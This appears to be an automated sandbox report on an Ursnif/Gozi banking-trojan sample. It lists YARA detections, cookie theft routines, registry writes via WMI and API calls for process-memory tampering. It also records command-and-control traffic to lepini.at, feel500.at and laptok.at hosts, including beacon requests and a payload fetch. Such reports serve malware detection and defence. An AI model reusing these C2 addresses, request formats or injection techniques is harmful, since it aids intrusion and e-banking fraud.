Source: global traffic	HTTP traffic detected: GET /api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: golang.feel500.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/PA66UeKSfQRT_2Fcj/iLfHO8gQWTV6/hOef_2Bpj3m/vKET8aGISBfnMY/C7Rg8qWLOVBJvNGoXa3bh/JqG7kZOU_2B7n24F/sOI2F2WFZ1YAPkN/T_2BsNeHboXzrn7jqx/15bjKyLUT/gDA9ARyVldWTTyiXOC6v/tXtwdM8cZwpPI2KIOCU/YL8nL41xllyGRALppW8L48/k1SWSYBtfCxFZ/fJXP1vjj/fSbg8F1Si24u64v54ydTM3o/jeiSZAFtwp/B6QKlmIvy6M21AUkZ/3j_2BqQ9D79g/1CFMkegOFCy/pEDZCVezoXWN_2/Bc4g_2B7Dm/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/YULajG8YI4XFMV/YmAg5JNx_2FDNG7TuSVBW/rDRyxARgDEEEuHQw/evIJnvp2g7SCy8L/bJrKo5atF48FzBlZet/fbl2Ha7GH/_2BH9MOFklEvfboI7qgC/aeuT1qWtgUC6wBSbBT9/_2BAmM7g9d5p3WEfySPQlF/ssCzZKRVALgEk/sp0I8w6X/DrAFLFSHvA1oX_2BP0tpKNl/ZAxxPEdckm/yZJPnbWMUA7uRge39/ml3K2b_2FU2A/XzCLaq3SmxR/10nkXEQkMm0VbN/VC8xNzQeSqT1Wl479mf3g/IZqBR2_2FJ_2BQ8j/wVSGqvItzNt/3rN HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 12 Feb 2021 08:59:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: loaddll32.exe, rundll32.exe, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000001E.00000003.614713182.00000232FA37D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000001.00000003.542325936.0000000000C41000.00000004.00000001.sdmp	String found in binary or memory: http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/
Source: rundll32.exe, 00000001.00000002.619811108.0000000000BE2000.00000004.00000001.sdmp	String found in binary or memory: http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo
Source: loaddll32.exe, 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, rundll32.exe, 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.617070310.00000232E1ED1000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.613638611.0000018F5E0F1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000021.00000002.614677054.0000018F5E2FE000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001E.00000002.656957513.00000232F1F33000.00000004.00000001.sdmp, powershell.exe, 00000021.00000002.654412669.0000018F6E153000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

E-Banking Fraud:

Detected Gozi e-Banking trojan

Show sources

Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_009B5ECA
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	0_2_009B5ECA
Source: C:\Windows\System32\loaddll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	0_2_009B5ECA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_00C95ECA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie	1_2_00C95ECA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_00C95ECA

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_009BA027
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_009C7AFF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009CAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_009CAC94
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_009C6CBC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_009BACD5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009CCD7A NtQueryInformationProcess,	0_2_009CCD7A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_009B7E14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C40A7 memset,NtQueryInformationProcess,	0_2_009C40A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_009B7878
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_009D298D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BAA15 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_009BAA15
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C4C67 NtGetContextThread,RtlNtStatusToDosError,	0_2_009C4C67
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_009B9DAC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_009B45FF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_009C956E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_009C1606
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_009B37E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9E010 GetProcAddress,NtCreateSection,memset,	1_2_00C9E010
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_00C9A027
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_00CA7AFF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_00C9ACD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CAAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_00CAAC94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_00CA6CBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C99DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00C99DAC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CACD7A NtQueryInformationProcess,	1_2_00CACD7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA7579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,	1_2_00CA7579
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C97E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_00C97E14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C937E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00C937E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB47A1 NtMapViewOfSection,	1_2_00CB47A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA40A7 memset,NtQueryInformationProcess,	1_2_00CA40A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C97878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_00C97878
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CB298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_00CB298D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C9AA15 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_00C9AA15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA4C67 NtGetContextThread,RtlNtStatusToDosError,	1_2_00CA4C67
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00C945FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_00C945FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_00CA956E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_00CA1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_00CA1606

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009D1CB8 CreateProcessAsUserA,

0_2_009D1CB8

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C48AD	0_2_009C48AD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BD0DC	0_2_009BD0DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009CD057	0_2_009CD057
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D7188	0_2_009D7188
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B62FA	0_2_009B62FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009BE384	0_2_009BE384
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009C8BF3	0_2_009C8BF3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009B4C03	0_2_009B4C03
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009CED4B	0_2_009CED4B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009D3EAF	0_2_009D3EAF
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_009CD7BD	0_2_009CD7BD
